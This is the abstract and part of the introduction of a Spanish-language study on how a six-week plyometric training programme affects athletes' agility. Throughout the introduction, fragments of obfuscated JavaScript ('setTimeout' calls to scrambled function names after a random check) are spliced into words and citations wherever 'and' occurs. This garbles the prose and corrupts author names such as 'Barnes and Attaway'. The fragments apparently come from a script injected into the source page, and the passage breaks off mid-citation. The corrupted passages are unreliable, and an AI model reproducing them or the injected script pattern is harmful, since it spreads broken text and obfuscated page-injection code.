EFECTO DE LA APLICACIÓN DE UN PROGRAMA DE ENTRENAMIENTO BASADO EN LA PLIOMETRIA SOBRE LA AGILIDAD DE UN ATLETA

Autor: Emiliano Blanco Valero.

Estudiamos el efecto que tiene la realización de un programa de entrenamiento de 6 semanas basado en la pliometría sobre la agilidad de un atleta para conocer si es determinante o no en el rendimiento del deportista. Utilizaremos como variable independiente la aplicación, o no, del entrenamiento basado en la pliometría con el objetivo de probar la mejora de la agilidad en el atleta. Los atletas (n= 28) fueron separados aleatoriamente en dos grupos, el grupo al que se le aplicaba el entrenamiento ( n=14) y el grupo control al que no se le aplicaba (n=14). Todos los deportistas realizaron las pruebas basadas en 3 ensayos de pre y post capacitación para determinar los resultados sobre la agilidad. Estas pruebas fueron en primer lugar el T-test, a continuación la prueba de agilidad de Illinois y finalmente una placa de ensayo. Los resultados del estudio demostraron diferencias significativas entre la aplicación del entrenamiento  y su ausencia sobre el efecto directo en la agilidad. Concluimos con que existen evidencias significativas, (p < 0.05), respecto al grupo que lleva a cabo la  utilización del programa de entrenamiento en relación al grupo que no se le aplica.

1.- INTRODUCCIÓN

La Pliometría son técnicas de formación utilizadas por los atletas en todos los tipos de deportes para aumentar la fortaleza y explosividad (Chu, 1998). La pliometría consiste en una rápido estiramiento de un músculo (acción excéntrica) inmediatamente seguida de una reducción concéntrica o acción del mismo músculo y del tejido conjuntivo (Baechle y Earle, 2000). La energía elástica almacenada en el músculo se utiliza para producir más fuerza que puede ser asumida por una acción exclusivamente concéntrica (Asmussen y Bonde-Peterson, 1974; Cavagna, 1977; Komi, 1992; Miller, et al., 2002; Pfeiffer, 1999; Wathen, 1993).

Los investigadores han demostrado que la pliometría, cuandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando se utiliza con una formación de fuerza y con cierta perodicidad, puede contribuir a mejoras en el rendimiento del salto vertical, de la aceleración, fuerza en la pierna, energía muscular, aumento de  sensibilización conjuntas y, en general, en la  propiocepción (Adams, et al., 1992; Anderst et al., 1994; Bebi et al., 1987; Bobbert, 1990; Brown et al., 1986; Clutch

et al. 1983; Harrison y Gaffney, 2001; Hennessy y Kilty, 2001; Hewett et al., 1996; Holcomb et al. 1996; Miller et al., 2002; Paasuke et al., 2001; Potteiger et al., 1999; Wilson et al., 1993).

La pliometría implica la parada, el comienzo, y los cambios de direcciones de una manera explosiva. Estos movimientos son componentes que pueden ayudar a desarrollar la agilidad (Craig, 2004; Miller et al., 2001; Parsons et al., 1998; Yap et al., 2000; Young et al., 2001). La agilidad es la capacidad de mantener o controlar la posición del cuerpo mientras se van dandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando rápidos cambios de dirección durante una serie de movimientos (Twist y Benickly, 1995).

El entrenamiento de agilidad, como se piensa, se encarga de hacer cumplir la programación de lo motriz a través del acondicionamiento neuromuscular y de adaptación neuronal de los husos musculares,, y en conjuntos, los  proprioceptores (Barnes andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}and Attaway, 1996; Craig, 2004, Potteiger et al., 1999). Al mejorar el equilibrio y el control de las posiciones corporales en movimiento, la agilidad, en teoría, debe mejorar. Se ha indicado que los aumentos de fuerza y  energía en la pliometría pueden aumentar el objetivo del estudio la agilidad. (Stone andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}and O’Bryant,1984), además, las actividades basadas en la pliometría han sido usadas en deportes como el fútbol, el tenis,.. y en otros acontecimientos deportivos donde la agilidad puede llegar a ser muy útil y beneficiosa para sus atletas. (Parsons andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}and Jones, 1998; Renfro, 1999; Robinson andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}and Owens, 2004; Roper, 1998; Yap